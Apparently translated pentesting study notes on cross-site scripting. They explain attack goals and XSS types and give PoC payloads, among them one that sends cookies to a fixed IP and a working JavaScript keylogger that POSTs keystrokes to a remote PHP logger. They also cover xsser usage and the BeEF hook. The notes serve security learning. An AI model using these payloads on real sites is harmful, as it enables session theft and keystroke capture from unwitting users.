XSS principle and its corresponding tools



XSS (severity: whatever JS can do in the browser, XSS can do to the client):


Principle: through a vulnerability in a web site, malicious script code is delivered to the client, so that the attack takes effect on the client.


Main attack purposes (web-page Trojan: through XSS, a link to malicious JS is inserted into the front page; when a client visits the page it also requests and executes that malicious JS, which is the web Trojan):

1. Stealing cookies (collecting the cookies of users of a website that has an XSS vulnerability)

2. Redirection (visiting the real page sends the user straight to a gambling page or phishing site)

3. DDoS against a third party (a URL that requires heavy computation is planted on the site with the XSS vulnerability; users who visit the site then request that computationally expensive URL, so the server behind it suffers a CC attack)




XSS types:

1. Stored (persistent)  ===> the JS script is uploaded to the server and loaded by every other user who accesses it. E.g. a forum post: the server did not filter the post content, so a JS script was uploaded inside the post.

2. Reflected (non-persistent) (whatever you send to the target is returned to you unchanged)  ===> the client sends malicious JS to the server (the JS can be carried in the GET request), the server returns this JS to the client, and the client's browser runs it ===> through social engineering, a link containing the JS script is sent to the victim, e.g.:

3. DOM-based (essentially also a reflected type)   ===> the JS does not necessarily have to be uploaded to the server; it can execute purely on the client.




PoC verification principle:

Inject JS code into every variable and test.

Test statements (PoC):

alert('xss')   ===> JS pop-up

click   ===> HTML hyperlink

window.location='http://www.baidu.com'   ===> redirect to Baidu

new Image().src=""+document.cookie;   ===> send the cookie to 172.20.163.101

 ===> automatically requests http:// (a real malicious JS script can be loaded this way)





An example of planting a web-page Trojan (keylogger function):

1. Through XSS, upload a link to the Trojan file to the vulnerable server

2. When a client visits the server it requests and executes http://

3. a.js sends the client's keystroke records to the specified server ("POST","",true)



Keylogger (JS code):

document.onkeypress = function(evt) {
  evt = evt || window.event;
  // translate the key event into the character that was typed
  var key = String.fromCharCode(evt.charCode);
  if (key) {
    var http = new XMLHttpRequest();
    var param = encodeURI(key);
    http.open("POST", "", true);   // send the recorded result to http://
    http.send(param);
  }
};







Password receiver (PHP code; note: this only records keystrokes on the current page, not pages of other sites):

$logfile = "keylog.txt";      // the received result is stored in the file keylog.txt
$fp = fopen($logfile, "a");
fwrite($fp, $key);            // $key: the keystroke received in the POST body (how it is read is not shown here)
fclose($fp);









xsser (XSS vulnerability detection tool)

xsser --gtk   ===> opens the graphical interface

xsser usage example: xsser -u "" -g "xss_r/?name=" --cookie="security=low; PHPSESSID=34554fae634cb96063453427536bda0b" -s -v --reverse-check

-u  URL to test (note: only write the path up to the second-to-last directory)

-g  use the GET method; for the POST method use '-p' instead. Followed by the name of the variable to test (remember to include the variable's parent directory)

--cookie  cookie information

-s  show the total number of payloads sent

-v  show details

--reverse-check: without this parameter xsser only sends a hash value to the server and checks whether the hash is returned intact. This can be a problem: the server may leave the hash value unfiltered while it does filter HTML/JS code, so xsser reports an XSS vulnerability that cannot actually be exploited. With this parameter xsser additionally sends a real JS script to confirm the finding (the script's only function is to connect back to a port opened by xsser itself; if xsser sees a connection to its own port after sending the JS, the target really has an XSS vulnerability).



--heuristic  check filtered characters (some security devices filter out specific characters; with this parameter you can see which characters they filter) (principle: send each possibly-filtered character on its own and see whether it is returned)
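As an added illustration of the --heuristic and --reverse-check principles described above (this is not xsser's own code), the Python below runs both probes against three constructed stand-ins for a reflecting server; the server functions, probe characters and verdict strings are all assumptions made for the example.

```python
import html
import re
import secrets

# Constructed stand-ins for a web application (not a real target): each takes the
# value of a reflected parameter and returns the page body the server would send.
def server_no_filter(value):
    return f"<p>Hello {value}</p>"

def server_strips_tags(value):
    # Reflects the text but removes anything that looks like an HTML tag.
    return f"<p>Hello {re.sub(r'<[^>]*>', '', value)}</p>"

def server_escapes(value):
    # Proper output encoding: every HTML metacharacter is entity-encoded.
    return f"<p>Hello {html.escape(value, quote=True)}</p>"

def reflected_intact(server, payload):
    """Send payload between two random markers; True only if it comes back unchanged."""
    marker = secrets.token_hex(8)
    probe = f"{marker}{payload}{marker}"
    return probe in server(probe)

PROBE_CHARS = "<>\"'&/();="

def filtered_characters(server):
    """--heuristic principle: send each metacharacter alone, list those that do not survive."""
    return [c for c in PROBE_CHARS if not reflected_intact(server, c)]

def assess(server):
    """--reverse-check principle: a bare random value first, then real markup."""
    hash_reflected = reflected_intact(server, "")            # like the hash-only probe
    markup_reflected = reflected_intact(server, "<i>x</i>")  # harmless element in place of real JS
    if hash_reflected and markup_reflected:
        return "markup reflected unencoded: reflected XSS likely"
    if hash_reflected:
        return "value reflected but markup altered: hash-only check would be a false positive"
    return "value not reflected"

if __name__ == "__main__":
    for srv in (server_no_filter, server_strips_tags, server_escapes):
        print(srv.__name__, filtered_characters(srv), "->", assess(srv))
```

The tag-stripping server reports no filtered characters (each character alone survives) yet fails the markup probe, which is exactly the false positive a hash-only check produces and why the second, real-payload stage matters.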


The following parameters encode the submitted data:

--Str               Use method String.FromCharCode()

--Une               Use Unescape() function

--Mix               Mix String.FromCharCode() and Unescape()

--Dec               Use Decimal encoding

--Hex               Use Hexadecimal encoding

--Hes               Use Hexadecimal encoding with semicolons

--Dwo               Encode IP addresses with DWORD

--Doo               Encode IP addresses with Octal

--Cem=CEM           Set different 'Character Encoding Mutations' (reversing obfuscators) (ex: 'Mix,Une,Str,Hex')


Besides the specified variables, some special places can also be injected:

--Coo               XSS injection detection against the COOKIE

--Xsa               XSS injection detection against the User-Agent

--Xsr               XSS injection detection against the Referer

--Dcp               XSS injection detection via Data Control Protocol

--Dom               XSS injection detection of the DOM type

--Ind               IND - HTTP Response Splitting Induced code

--Anchor            ANC - Use Anchor Stealth payloader (DOM shadows!)








BeEF (the user's browser can be manipulated)

Using an XSS vulnerability or man-in-the-middle hijacking, a specific JS (the hook served at <server's IP>:3000/hook.js) is inserted into the web page; this JS connects the controlled client browser back to the BeEF server.

Put another way: <server's IP>:3000/hook.js is just a JS Trojan, and the BeEF server is the Trojan's server side.



Menu details:

Details: browser and plug-in version information; operating system information

Logs: records the browser's actions, such as focus changes, mouse clicks, text input, etc.

Commands: command modules

Green module: the module works against the target browser and its execution result is not visible to the client

Red module: the module is not suitable for the current browser, although some red modules can still execute normally

Orange module: the module is available, but its results are visible to the user (e.g. a camera permission prompt)

Grey module: the module has not been tested on the target browser